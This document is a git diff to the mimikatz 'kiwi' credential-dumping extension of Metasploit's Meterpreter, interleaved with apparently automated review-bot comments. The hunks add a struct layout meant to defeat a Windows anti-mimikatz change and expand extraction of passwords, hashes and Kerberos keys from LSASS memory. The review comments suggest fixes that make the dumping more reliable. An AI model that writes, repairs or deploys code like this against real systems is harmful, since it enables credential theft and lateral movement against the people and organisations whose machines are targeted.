diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
index 1f987a68..91721036 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -47,6 +47,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
 {sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
+ {sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
 };
@@ -317,9 +318,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
 if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
 helper = &lsassEnumHelpers[3];
 if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
- helper = &lsassEnumHelpers[4];
- else
 helper = &lsassEnumHelpers[5];
+ else
+ helper = &lsassEnumHelpers[6];
+
+
+ if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
+ helper++; // yeah, really, I do that =)
 securityStruct.hMemory = cLsass.hLsassMem;
 securityStruct.address = LogonSessionListCount;
@@ -389,7 +394,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
 dprintf(L"[KIWI] callback invoked with %p", pData);
 if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
 {
- kuhl_m_sekurlsa_printinfos_logonData(pData);
+ dprintf(L"[KIWI] pData->LogonType != Network, printing logon data");
+ //kuhl_m_sekurlsa_printinfos_logonData(pData);
+ dprintf(L"[KIWI] logondata printed, iterating through packages");
 for(i = 0; i < pLsassData->nbPackages; i++)
 {
 if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
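Review bot: The `helper++` added at the end of the layout selection only works because the `_ANTI_MIMIKATZ` entry in the hunk above sits at `lsassEnumHelpers[4]`, immediately after the entry chosen for `< KULL_M_WIN_MIN_BUILD_8`; any later reordering of the table silently selects the wrong struct layout, and a reader has nothing to tell them what `0x53480000` is beyond "a module TimeDateStamp threshold". I would make the selection explicit and named rather than relative, e.g. `helper = &lsassEnumHelpers[4]; /* KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ */` together with a named constant such as `#define KUHL_M_SEKURLSA_MSV_TIMESTAMP_ANTI_MIMIKATZ 0x53480000` and a comment stating which lsasrv build range the stamp separates, replacing the `// yeah, really, I do that =)` comment. The hunk also drops the `else` chain between the `< KULL_M_WIN_MIN_BUILD_8` and `< KULL_M_WIN_MIN_BUILD_BLUE` checks as shown, so if the context really is two independent `if`s the first assignment is dead for every build below BLUE; worth confirming against the surrounding lines. kuhl_m_sekurlsa_enum begins and ends outside this hunk.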
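Review bot: The two new trace lines in kuhl_m_sekurlsa_enum_callback_logondata claim "printing logon data" and "logondata printed" while the call that would print it, `kuhl_m_sekurlsa_printinfos_logonData(pData)`, has been commented out between them, so anyone reading the debug output will be misled about what ran. Either restore the call or reword the traces to what actually happens, e.g. `dprintf(L"[KIWI] pData->LogonType != Network, iterating through packages");`, and delete the commented-out line rather than leaving it as dead code. The same style of trace is added by the following hunk (`[KIWI] package iteration done`), which is accurate and can stay. The enclosing function starts before this hunk.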
@@ -399,6 +406,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
 kprintf(L"\n");
 }
 }
+ dprintf(L"[KIWI] package iteration done");
 }
 return TRUE;
 }
@@ -612,7 +620,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
 {
 pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
- kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
+ kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
 if (buffer.Length = buffer.MaximumLength = (USHORT)pHashPassword->Size)
 {
 buffer.Buffer = (PWSTR)pHashPassword->Checksump;
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
index 332e6fb4..16fa1524 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
@@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
 PVOID CredentialManager;
 } KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
+typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
+ struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
+ struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
+ PVOID unk0;
+ ULONG unk1;
+ PVOID unk2;
+ ULONG unk3;
+ ULONG unk4;
+ ULONG unk5;
+ HANDLE hSemaphore6;
+ PVOID unk7;
+ HANDLE hSemaphore8;
+ PVOID unk9;
+ PVOID unk10;
+ ULONG unk11;
+ ULONG unk12;
+ PVOID unk13;
+ LUID LocallyUniqueIdentifier;
+ LUID SecondaryLocallyUniqueIdentifier;
+ BYTE waza[12]; /// to do (maybe align) <===================
+ LSA_UNICODE_STRING UserName;
+ LSA_UNICODE_STRING Domaine;
+ PVOID unk14;
+ PVOID unk15;
+ PSID pSid;
+ ULONG LogonType;
+ ULONG Session;
+ LARGE_INTEGER LogonTime; // autoalign x86
+ LSA_UNICODE_STRING LogonServer;
+ PKIWI_MSV1_0_CREDENTIALS Credentials;
+ PVOID unk19;
+ PVOID unk20;
+ PVOID unk21;
+ ULONG unk22;
+ PVOID CredentialManager;
+} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
+
 typedef struct _KIWI_MSV1_0_LIST_62 {
 struct _KIWI_MSV1_0_LIST_62 *Flink;
 struct _KIWI_MSV1_0_LIST_62 *Blink;
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
index a69f811f..31878692 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
@@ -5,7 +5,7 @@
 */
 #include "kuhl_m_sekurlsa_credman.h"
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
 NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
index 4a0b2357..d8c3d2d9 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
@@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
 PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
 {
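Review bot: The extra `0` inserted into `{{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}` is a positional initializer that has to be edited in lock-step with a struct field added elsewhere in this commit (the `ULONG TimeDateStamp` in kull_m_process.h), and the identical edit is repeated in kuhl_m_sekurlsa_dpapi.c, kuhl_m_sekurlsa_kerberos.c, kuhl_m_sekurlsa_livessp.c, kuhl_m_sekurlsa_msv1_0.c, kuhl_m_sekurlsa_ssp.c, kuhl_m_sekurlsa_tspkg.c and kuhl_m_sekurlsa_wdigest.c. Every value in that nested aggregate is zero, so writing the trailing member as `{{0}, FALSE, FALSE}` would have made this a no-op and keeps the next inserted field from silently shifting the meaning of the remaining positions; designated initializers would do the same if the compiler in use accepts them, which I cannot confirm from the page. A one-line comment on the package definition naming what the nested aggregate is would also help, since the member names are not visible here.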
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
index 461928de..93977604 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
 },
 };
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
 NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
@@ -184,6 +184,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
 PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
 DWORD i;
 kuhl_m_sekurlsa_printinfos_logonData(pData);
+ kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
+ kprintf(L"\n");
 for (i = 0; i < 3; i++)
 {
 kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
@@ -199,7 +201,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
 if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
 {
 kuhl_m_sekurlsa_printinfos_logonData(pData);
- kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
+ kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
+ kprintf(L"\n\t * Key List :\n");
 if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
 {
 if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
@@ -397,7 +400,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
 if (App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
 {
 if (kull_m_file_writeData(filename, (PBYTE)App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
- kprintf(L"\n\t * Saved to file %s !\n", filename);
+ kprintf(L"\n\t * Saved to file %s !", filename);
 else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
 LocalFree(App_KrbCred);
 }
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
index 7267c3df..a9f5b885 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
@@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
 PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
 NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
index caf636fa..ec89b1a9 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
@@ -9,7 +9,7 @@
 const ANSI_STRING PRIMARY_STRING = {7, 8, "Primary"}, CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
 NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
@@ -94,34 +94,40 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
 {
 KIWI_MSV1_0_CREDENTIALS credentials;
 KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
- KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
- KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
+ KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
+ KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { pCredentials, cLsass->hLsassMem };
- while(aLsassMemory.address)
+ while (aLsassMemory.address)
 {
 aLocalMemory.address = &credentials;
- if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
+ if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
 {
 aLsassMemory.address = credentials.PrimaryCredentials;
- while(aLsassMemory.address)
+ while (aLsassMemory.address)
 {
 aLocalMemory.address = &primaryCredentials;
- if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
+ if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
 {
 aLsassMemory.address = primaryCredentials.Credentials.Buffer;
- if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
+ if (kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
 {
- if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
+ if (kull_m_string_getUnicodeString((PUNICODE_STRING)&primaryCredentials.Primary, cLsass->hLsassMem))
 {
 credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
 LocalFree(primaryCredentials.Primary.Buffer);
- }
+ }
 LocalFree(primaryCredentials.Credentials.Buffer);
 }
- } else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
+ }
+ else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
 aLsassMemory.address = primaryCredentials.next;
 }
 aLsassMemory.address = credentials.next;
- } else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
+ }
+ else
+ {
+ kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
+ break;
+ }
 }
 }
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
index b386325a..cd659ce2 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
@@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
 PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
 NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
index 360cdbe5..452f0284 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
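Review bot: The new `break` in the outer `else` stops kuhl_m_sekurlsa_msv_enum_cred from re-reading a stale `credentials.next` after a failed copy, but the inner loop keeps the same shape unfixed: when `kull_m_memory_copy` of `KIWI_MSV1_0_PRIMARY_CREDENTIALS` fails, execution falls through to `aLsassMemory.address = primaryCredentials.next;`, which is either the previous entry's `next` (the very address that just failed, so the loop spins forever printing `n.e.`) or, on the first pass, an uninitialized local. The inner `else` should mirror the outer one: `else { kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"); break; }`, after which the outer `aLsassMemory.address = credentials.next;` still advances correctly because `credentials` was copied successfully. A short comment on both `break`s saying the pointer chain is untrusted remote memory and a failed read must terminate the walk would make the intent clear to the next reader. The rest of this hunk is whitespace only.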
@@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
 PRTL_AVL_TABLE TSGlobalCredTable = NULL;
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
 NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
index 15a8df33..5b756d0d 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
@@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
 PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
 LONG offsetWDigestPrimary = 0;
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
 NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
index d46dd5d9..08449a4e 100644
--- a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
+++ b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
@@ -101,6 +101,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 moduleInformation.DllBase.address = pLdrEntry->DllBase;
 moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
 moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
+ kull_m_process_adjustTimeDateStamp(&moduleInformation);
 continueCallback = callBack(&moduleInformation, pvArg);
 }
 status = STATUS_SUCCESS;
@@ -121,6 +122,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 moduleName.Length = pLdrEntry32->BaseDllName.Length;
 moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
 moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
+ kull_m_process_adjustTimeDateStamp(&moduleInformation);
 continueCallback = callBack(&moduleInformation, pvArg);
 }
 status = STATUS_SUCCESS;
@@ -151,8 +153,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
